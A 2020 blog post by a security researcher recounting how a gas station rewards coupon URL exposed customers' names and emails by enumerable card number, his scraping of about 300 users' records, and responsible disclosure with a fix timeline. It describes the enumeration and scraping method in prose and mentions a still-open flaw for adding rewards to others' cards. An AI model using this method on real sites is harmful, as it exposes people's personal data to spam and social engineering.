Leaky Gas Pump: Harvesting User Data From a Local Gas Station

Michael Gillespie
4 min readNov 7, 2020

--

Photo by sippakorn yamkasikorn on Unsplash

Late October this year, I was simply checking my personal mail, and combing thru the endless spam and rewards programs I’ve happened to get myself signed up to. One of these (legitimate) rewards emails was from a local gas station: a coupon for 6 cents off per gallon, and a handy link to load it to my rewards card (which is scanned at the pump). How nicely timed; I just so happen to need to fill up this weekend, so why not.

Coupon to load onto my rewards card

After clicking the link and being redirected thru their third-party tracker URL, I am greeted with a confirmation for my discount. Alrighty, ready to head to the pump!

Reward confirmation (different reward pictured)

However… wait a minute. Is that my full name, and personal email address shown? I check and I’m not actually logged into their website. Going to “My Account” confirms I need to login still. I quickly copy and paste the URL from the email to a new incognito window in Chrome, and other than showing the reward was already loaded, I still see my name and email address!

Ok, surely this must be a special link from the email that is “authorizing” me as a one-time thing, such as a nonce.

Final URL from the coupon link

Nope. Just parameters for a numeric card number, and the offer code itself. As a cyber security researcher, this piqued my interest.

Taking a look at the card number, it is simply a 16-digit number, and matches my physical card. No obfuscation or hashing to be seen. So, I start playing with it.

I start by incrementing the card number by one off from mine.

cardnumber+1

Ok, so not every card is sequentially valid… however, I start punching in some somewhat random numbers, and…

cardnumber+rand()

Uh oh. That is totally not my name or email address, and yet I can view it easily.

So, at this point, we have everything we need to harvest user data. We have a URL with an enumerable parameter, and even a fail text if we guess a wrong card number. All we need to do now is write a quick-and-dirty Python bot using information from the HTML structure to parse out the user data.

Inspecting the page structure
Simple Python scraper

After working out a few kinks such as a reasonable card range, and finding out some cards somehow did not have a name or email address registered (good in this case), I was able to easily harvest about 300 valid user’s information while I went to lunch.

Python bot in action

If I were a malicious actor, I could easily multi-thread this, and distribute the load over a few machines or something. The only bottleneck was the time for the HTTPS handshake really, as there was definitely no other security measures or throttling in place to prevent this.

I did confirm I could not access these accounts, but could easily harvest a list of full names and email addresses. It doesn’t take much to imagine the social engineering tricks or general spam you could do with this and the knowledge of the gas station chain they frequent — which kind of narrows down their geolocation.

In the spirit of responsible disclosure, I did attempt to reach out to the company. Their website had no such web admin contact information, a contact form, or a security.txt on the domain. In the end, I was able to reach their support via Twitter DM, and after a few weeks, their development team fixed it by simply removing the information from the page when you are not logged in.

Rewards page no longer shows a name or email address

While investigating this, I did also find I could arbitrarily add any (valid) reward to anyone’s card of course. Making a bot to parse the page, grab any rewards shown as applicable to their card, and making another call to add it to the card would be trivial. This flaw actually still exists; luckily, it seems more like charity work than anything malicious I could think of.

Timeline:

  • 10/17/20 — bug discovered
  • 10/17/20 — reached out to support and received acknowledgement
  • 10/21/20 — received acknowledgement dev team is working on a fix
  • 10/30/20 — bug reported as fixed, confirmed

--

--